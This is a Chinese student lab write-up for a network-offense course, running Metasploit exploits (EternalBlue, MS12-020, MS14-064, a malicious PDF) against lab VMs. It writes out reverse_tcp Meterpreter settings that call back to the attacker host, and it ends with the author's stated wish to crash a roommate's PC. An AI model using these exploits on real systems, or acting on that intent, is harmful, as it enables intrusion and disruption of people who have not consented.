2018-2019 网络对抗技术 20165231 Exp5 MSF基础应用
實踐內容(3.5分)
本實踐目標是掌握metasploit的基本應用方式,重點常用的三種攻擊方式的思路。具體需要完成:
1.1一個主動攻擊實踐(1分)
- ms08_067; (失敗)
- MS17-010永恒之藍(成功)
- MS12-20(比永恒之藍更藍的藍屏)(本來以為唯一后來不唯一了)
1.2 一個針對瀏覽器的攻擊(1分)
- ms14_064(成功)
1.3 一個針對客戶端的攻擊(1分)
- Adobe(成功)
1.4 成功應用任何一個輔助模塊。(0.5分)
- 掃描查看靶機開放端口(唯一)
以上四個小實踐可不限于以上示例,并要求至少有一個是和其他所有同學不一樣的,否則扣除0.5分。
實驗過程
基礎問題回答
(1)用自己的話解釋什么是exploit,payload,encode.
任務一:一個主動攻擊實踐
漏洞MS08_067
關于漏洞MS08_067的原理
msfconsole進入msf控制臺
search ms08_067查看該漏洞
use exploit/windows/smb/ms08_067_netapi使用該漏洞
show payloads回鏈攻擊載荷
關閉防火墻,改變安全策略,查看445端口狀況,甚至改變winxp版本,由中文版改成英文版
很遺憾始終是只能檢測出系統卻無法生成有效的會話
ms17_010永恒之藍
攻擊方:kali 192.168.70.131
靶機:win7 192.168.70.130
輸入msfconsole指令,打開控制臺;
依次輸入以下指令進行設置與攻擊:
set payload windows/x64/meterpreter/reverse_tcp //選擇攻擊載荷set LHOST 192.168.70.131 //設置攻擊方ipset RHOST 192.168.70.130 //設置靶機ipexploit
連接成功
嘗試命令查看靶機ip
MS12-20
攻擊機kali 192.168.70.131
靶機windows 7 192.168.70.130
用kali自帶的的掃描工具nmap 查看靶機是否開啟3389端口。(沒開就把他打開!)
掃描之后發現3389是開放的,然后啟動msfconsole, 利用里面的模塊查看是否存在Ms12-020漏洞。
查詢模塊
然后exploit
100%表示可以攻擊
攻擊模塊
然后還是exploit
出現seems down說明靶機已經藍上了!
一個針對瀏覽器的攻擊
ms14_064
主機 kali 192.168.70.131
靶機 Windows XP SP3 192.168.70.141
然后exploit開啟監聽,然后生成網址,將這個網址在靶機打開后攻擊機就捕獲了靶機,建立會話
一個針對客戶端的攻擊
Adobe
攻擊方:kali 192.168.70.131
靶機:winxp 192.168.70.141
輸入msfconsole指令,打開控制臺;
依次輸入以下指令進行設置
set payload windows/meterpreter/reverse_tcp //設置tcp反向連接 set LHOST 192.168.70.131//攻擊方IP set LPORT 5231 //攻擊方攻擊端口 set FILENAME wyhy_exp5.pdf在終端中,將生成的文件按照文件路徑復制出來,并復制到靶機中
在kali中重新打開,并輸入以下指令進行監聽: use exploit/multi/handler //進入監聽模塊 set payload windows/meterpreter/reverse_tcp //設置tcp反向連接 set LHOST 192.168.70.131 //攻擊方IP set LPORT 5231 //攻擊方攻擊端口 exploit //監聽
輔助模塊
查看靶機端口
使用auxiliary/scanner/portscan/tcp模塊,用來掃描靶機的TCP端口使用情況;
執行命令use auxiliary/scanner/portscan/tcp進入并使用模塊;
show options查看需要設置的參數信息,設置靶機的ip為RHOST
然后expolit
基礎問題回答
- 用自己的話解釋什么是exploit,payload,encode.
exploit:英文翻譯為利用,黑客就是利用漏洞對電腦進行攻擊,有漏洞不一定可以利用,但可以利用的一定有漏洞。
payload:有效載荷。通常在傳輸數據時,為了使數據傳輸更可靠,要把原始數據分批傳輸,并且在每一批數據的頭和尾都加上一定的輔助信息,而其中的原始數據就是payload
encode:編碼器,用來給payload進行編碼,保護payload不被發現
離實戰還缺些什么技術或步驟?
實戰?首先我們只能在自己的局域網內實現。對于外網,不在同一子網下的地址鎖定無法實現就無法實戰攻擊,我覺得這是目前最大缺憾。
實驗感想
這次我最喜歡的就是那個藍屏漏洞,在CSDN上逛到的以為我是獨一無二結果……不過還是覺得那個很好玩,起初想做這個是想搞一下正在打Apex的室友讓他感受一下快要吃雞藍個屏,但是系統版本高了沒啥用。后續我會繼續利用更新的漏洞讓室友感受吃不到雞的樂趣o( ̄▽ ̄)o
轉載于:https://www.cnblogs.com/Yhooyon/p/10732656.html
總結
以上是生活随笔為你收集整理的2018-2019 网络对抗技术 20165231 Exp5 MSF基础应用的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: YAML简介和简单说明
- 下一篇: sudo的用法